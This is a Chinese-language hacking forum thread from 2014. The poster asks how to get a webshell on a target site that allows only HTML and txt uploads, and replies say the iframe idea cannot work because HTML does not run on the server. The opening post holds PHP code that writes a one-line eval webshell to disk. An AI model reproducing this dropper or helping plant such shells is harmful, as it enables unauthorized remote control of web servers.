查看: 8095|回复: 25

网站能上传HTML和txt,怎么拿shell

 关闭 [复制链接]

该用户从未签到

发表于 2014-7-9 12:47:43 | 显示全部楼层 |阅读模式
悬赏5i币未解决
本来想着用html加iframe浮动框架,包含一个远程的php的文件进来,然后php文件执行下面的代码在刚上传的1.html同目录下生成一个一句话文件。。。
可惜思路错误,执行php文件的代码后,并不能在1.html同目录下生成一个一句话文件。分析才发现想法太2,这样执行只能在原来那个php的文件夹下生成一句话文件。。。
[PHP] 纯文本查看 复制代码
<?php
$filename = '1.php';
if (file_exists($filename)) {

} else {
$ft=fopen("1.php",w);
fwrite($ft,'<?php eval ($_POST[cmd]);?>'); 
fclose($ft);
echo "write in";
}
?>

希望各位大大给出比较合适的方法

点评

这个问题你可以去HUC了 那些人智商高  发表于 2014-7-9 17:24
回复

使用道具 举报

该用户从未签到

 楼主| 发表于 2014-7-9 12:49:12 | 显示全部楼层
快来解答吧各位{:soso_e183:}
回复

使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2014-7-9 13:22:31 | 显示全部楼层
    {:soso_e127:}哥  这样能拿到shell我就服了你了 能通过html拿shell的方法我至今未见过 因为html不是在服务端运行的

    点评

    哥,难道说这个 歪脖树 咱拿不下来了?  详情 回复 发表于 2014-7-9 15:29
    回复

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2014-7-9 15:29:39 | 显示全部楼层
    Free_小东 发表于 2014-7-9 13:22
    哥  这样能拿到shell我就服了你了 能通过html拿shell的方法我至今未见过 因为html不是在服务 ...

    哥,难道说这个 歪脖树 咱拿不下来了?
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-9 17:44:38 | 显示全部楼层
    我也想知道
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-9 18:12:55 | 显示全部楼层
    你用html包含一个php,能在你拿shell的网站目录下生成出文件,就真见鬼了。
    回复

    使用道具 举报

    头像被屏蔽

    该用户从未签到

    发表于 2014-7-10 13:51:14 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2014-7-10 18:21:00 | 显示全部楼层
    拿到了说下,让我学习学习
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-11 21:27:45 | 显示全部楼层
    你看得懂这段php代码吗,哥{:soso_e153:},
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-12 00:46:48 | 显示全部楼层
    html不能在服务器端执行的,所以包含进去也执行不了
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 12:16 , Processed in 0.043763 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部